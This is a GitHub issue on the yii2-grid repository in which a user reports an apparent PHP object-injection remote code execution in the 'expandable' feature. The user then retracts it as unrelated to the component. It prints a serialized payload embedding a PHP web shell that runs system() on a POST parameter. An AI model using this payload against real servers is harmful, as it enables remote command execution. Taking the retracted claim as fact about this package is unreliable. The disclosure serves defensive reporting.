search

kartik-v / yii2-grid

Enhanced GridView with various utilities for Yii Framework 2.0
http://demos.krajee.com/grid
Other
556 stars 303 forks source link

Remote Code Execution – PHP Insecure Object Injection #970

Closed Ziggizag closed 3 years ago

Ziggizag commented 3 years ago

Hi Kartik,

It's about "expandable" functionality: image

It's possible to "inject" serialized unvetted command within "d" variable used to load expanded data and this way execute code remotely: image

Eg. injection of the serialized code like this:

[{"Name":"foo","Value":"bar","Domain":"<?php echo system($_POST['poc']); ?>","Path":"\/","Max-Age":null,"Expires":1604415553,"Secure":false,"Discard":false,"HttpOnly":false}]

Where 'poc' is whatever code passed through POST.

It's recommended to use JSON encoding rather than PHP serialization and implement verification of serialized data by some uniquely salted hash function.

Ziggizag commented 3 years ago

OK - this is actually not related to the Yii2 grid component. Sorry.